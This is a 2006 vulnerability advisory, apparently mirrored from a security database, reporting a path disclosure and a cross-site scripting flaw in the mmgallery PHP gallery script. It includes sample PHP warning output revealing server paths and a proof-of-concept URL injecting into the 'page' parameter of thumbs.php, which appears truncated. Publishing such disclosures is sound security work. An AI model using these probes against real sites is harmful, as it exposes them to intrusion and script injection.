Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15208
HistoryNov 25, 2006 - 12:00 a.m.

mmgallery Multiple vulnerabilities

2006-11-2500:00:00
vulners.com
7

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

  •                                                                             ;;ii,,:: +           
    
  •                                             ::::            ::              ;;tt;;::           + 
    
  •                                             ;;::          ..,,::            ;;ii,,::           + 
    
  •                       ,,,,                ii;;,,          ii;;::            ;;ii,,::           + 
    
  •                       ii::                tt;;,,        ..tt;;,,..          ;;ii;;::           + 
    
  •                     ii,,::                ttii,,        ..ff;;;;::          ;;ii;;::           + 
    
  •                     tt;;::..,,            tt;;,,          ff;;;;ii          ;;ii,,::           + 
    
  •                     tt;;::;;::            tt;;,,..        jj;;,,..          ;;tt,,::           + 
    
  •                     tt;;;;,,              tt;;,,..        tt;;;;            ;;ii;;::           + 
    
  •                 ..::,,;;,,                tt;;,,..        tt;;,,            ;;ii,,::           + 
    
  •             ..::,,ii;;;;..                tt;;,,..        iiii,,::          ;;ii,,::           + 
    
  •           ::,,ttiijj;;,,                  tt;;;;..        ;;tt,,::          ;;ii,,::           + 
    
  •         ,,;;ii    tt;;,,                  ii;;,,..        ..jj;;::          ;;ii;;::           + 
    
  •       ;;;;::      tt;;::                  tt;;;;..          ff;;::          ;;tt,,..           + 
    
  •     ii;;..      ,,ii;;::                  ii;;,,..          jj;;,,          ;;ii,,..           + 
    
  •   ,,;;,,      ::;;;;;;::                  ii;;;;..          tt;;,,          ;;ii;;..           + 
    
  •   tt;;::::  ::,,;;jj,,::                  tt;;,,..          tt;;,,          ;;ii,,..           + 
    
  •   jj;;;;,,,,,,iiiiii;;::                ..tt;;,,::          iiii,,          ;;ii,,..           + 
    
  •   ;;ffjjttjjttii  ii;;::                ii;;;;;;::          ..jj,,          ;;ii;;..           + 
    
  •       ..;;..      ii;;,,::            ,,;;;;jj;;,,          ..jj,,          ;;ii,,..           + 
    
  •                   iiii;;,,::::....::,,,,;;,,jj;;;;,,::    ::,,;;,,          ;;ii;;             + 
    
  •                   ..ff;;;;;;,,,,::,,;;;;;;  ttii;;;;,,,,,,,,;;;;::          ;;ii,,             + 
    
  •                     jjii;;;;;;;;;;;;;;ii..  ..ff;;;;;;;;;;;;;;;;            ;;ii,,             + 
    
  •                       jjjj;;;;ii;;;;tt..      iijj;;;;;;;;;;ii::            ;;ii::             + 
    
  •                         iijjjjjjtt;;            ;;ffffjjjjtt::              ;;ii               + 
    
  •                                                       ;;..                  ii;;               + 
    
  •                                                                             ..       + 
    

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

  •                                                                                             + 
    

Credit by : Al7ejaz HackerZ
mmgallery Multiple vulnerabilities
Script : mmgallery
Website: mmgallery.net
Impact : FullPath disclosure and Cross site Scripting
FullPath disclosure in thumbs.php


when thumbs.php file is called directelly withowth argument this cause fullpath disclosure
http://localhost/thumbs.php
Result

Warning: readdir(): supplied argument is not a valid Directory resource in
/var/www/photos/functions.inc on line 46
Warning: closedir(): supplied argument is not a valid Directory resource in
/var/www/user/functions.inc on line 58
Galery :: Title ::
Warning: opendir(.//thumbs) [function.opendir]: failed to open dir: No such file or directory in
/var/www/user/functions.inc on line 99
Warning: readdir(): supplied argument is not a valid Directory resource in /var/www/user/functions.inc
on line 101
Warning: sort() expects parameter 1 to be array, null given in /var/www/user/functions.inc on line 112
Warning: closedir(): supplied argument is not a valid Directory resource in
/var/www/user/functions.inc on line 113

Cross Site Scripting


page varibale is not proprely verified and can be used to execute arbitary htmlcode
http://localhost/thumbs.php?page='>
Al7ejaz HackerZ ;)
/Milw0rm